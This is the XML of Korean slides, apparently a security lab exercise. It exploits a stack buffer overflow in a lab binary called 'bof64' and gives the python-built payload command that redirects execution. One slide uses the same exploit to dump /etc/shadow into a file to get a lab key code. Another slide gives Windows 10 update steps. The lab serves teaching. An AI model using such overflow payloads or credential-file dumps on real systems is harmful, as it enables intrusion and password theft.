                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25506375"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6321475" y="461749"/>
          <a:ext cx="5340017" cy="5891961"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5340017">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="848009183"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="223301">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137873759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="565860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진입한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아래와 같이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복귀할 때 사용되는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1848564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="_x564918704">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB62A56-5106-4732-A942-17A4F364EB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691" y="3862882"/>
            <a:ext cx="3070601" cy="2490828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45057" name="_x564938504">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D06182-F8BD-488A-BBDC-63F3AD814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931" r="131"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6528131" y="993564"/>
            <a:ext cx="3109161" cy="237613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ADD21F57-1402-4FBE-B2FF-056962736F94}"/>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3EE55675-A8F8-4E2F-900E-930F6F26EA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2CC8D1AF-BF0A-45CE-93C0-3B3C5A977C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6047B1F9-F462-4312-AEE5-1989BAAF7D6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3514449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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./bof64 $(python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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0x0000000000400635</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>인텔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>x86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>x64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>아키텍처는 리틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>엔디언</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 사용하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>복귀 주소에 역으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 0x3506400000000000) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력한다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70331"/>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7" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8979F9E7-D4D4-4823-98DC-C11837B3C20C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505278" y="842130"/>
            <a:ext cx="4945761" cy="2744597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87EB1C4-726B-4F6C-863A-6B565A966529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1210289945"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="518232" y="4172331"/>
          <a:ext cx="4932807" cy="1711135"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="136858131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6749492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="140817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외의 사용자는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8783995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="_x564965576">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD50D22F-5C9F-4AB1-991A-AE7A350AC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65" y="4726843"/>
            <a:ext cx="45942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_x564966080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89101173-22A0-4202-A176-F2AD9B34D6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65" y="5242131"/>
            <a:ext cx="3413125" cy="5635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6ED209E0-61F7-41D0-8AA4-527392A4E355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755197" y="42762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8" name="표 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F02A76-5DC1-47DA-9569-0C049FE31AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3145730245"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6278110" y="434292"/>
          <a:ext cx="4932807" cy="3906393"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="61157822"/>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76049629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="35999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경우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종료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0x0000000000400635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번지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함수의 시작 주소</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복귀한다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931332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="_x564893288">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAF4901-2586-4E1D-9D27-DAC7A263B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4716" y="1079106"/>
            <a:ext cx="3297023" cy="267533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FCA5A70-20C7-4B00-9BF3-CC1B3F3C63F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4543284"/>
            <a:ext cx="5616792" cy="1945715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>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재실행 및 출력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>내용을 파일에 출력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./bof64 $(python -c 'print "A"*24+"\x35\x06\x40") &gt;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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명을 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득</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dirty="0"/>
              <a:t>    파일명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173B945A-D41B-48A0-A7DB-8F01DC99CABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272473" y="5036948"/>
            <a:ext cx="5408912" cy="359554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="그룹 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C391A830-1CD8-4D18-B2B4-3D8F8E924E25}"/>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59602A3-7E10-4F9E-8FF1-4BCC8DD6EED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FAC01971-F23F-4103-95FA-1CDA044D281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8" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56AF0A1-DD33-438C-B604-98229F633DC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8970142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11A4485-4317-4F31-A74B-0E009D382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 </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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A091AA-30F6-4270-8E55-4E599BAF0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8CA05AE-7C1C-425E-A911-D5525EA28A2E}"/>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19" name="타원 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B415383-2E2E-4BCE-85C7-5B35E10E2B32}"/>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64E1F945-D42A-4F25-B58D-E50A41EB32B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A443AC1F-F004-4379-9D4E-3A82ABE029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82F75C4-5F19-47F6-8EB1-6AAF8693BF3C}"/>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23" name="그룹 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72F7DF4A-2C59-43D2-9E01-C977F57C8F1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ED9C5224-3F64-4BC4-8DE3-421FE378DF1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019855F-303D-42F3-BC9E-336CBFA4E0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E1920E64-DD82-46FA-83AC-2C0E068991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77213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/WindowUpdate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>윈도우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>업데이트</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시작버튼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>톱니바퀴 아이콘 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="AppleSDGothicNeo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>업데이트 및 보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>을 클릭한다</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최신버전이 아니라면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드 및 설치 버튼 클릭 및 업데이트 진행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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>업데이트 버전의 다운로드가 완료되었다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC33DA47-3D5F-4FB2-8DA5-CCA063373CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662782" y="2277402"/>
            <a:ext cx="1104900" cy="1590675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{376A7B9C-771E-46BB-9322-7E2B17CBF202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1457767" y="4491778"/>
            <a:ext cx="1867442" cy="1373517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD5AF3F-8AAB-4974-B796-94C591F00CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248782" y="2339437"/>
            <a:ext cx="1897199" cy="2072229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C386BA60-0043-4409-AF0F-D17FD6A554B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6913823" y="2339437"/>
            <a:ext cx="1535470" cy="1985288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="화살표: 오른쪽 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8360139-8F96-41DF-BCE7-7BC3F3190034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8787739" y="3277588"/>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7B5B5EAE-7B3A-4028-8A49-C68252FB54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4819C586-30F4-4362-B695-12CF12BA93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69F2ABBF-20EC-43DF-A705-94671378E7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F90A7C3C-8D9A-4085-8C59-9775399389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6289340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/bof64</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05B8A24-0AD6-437D-9E5E-16BC5C819A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497114" y="1286850"/>
            <a:ext cx="4085971" cy="693420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87373DF7-8165-4254-A426-601E5AD83523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490528" y="2788920"/>
            <a:ext cx="4039489" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF911AFB-14D1-43A0-92BB-DDE8EC1868EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937964049"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497685" y="3540329"/>
          <a:ext cx="4932807" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
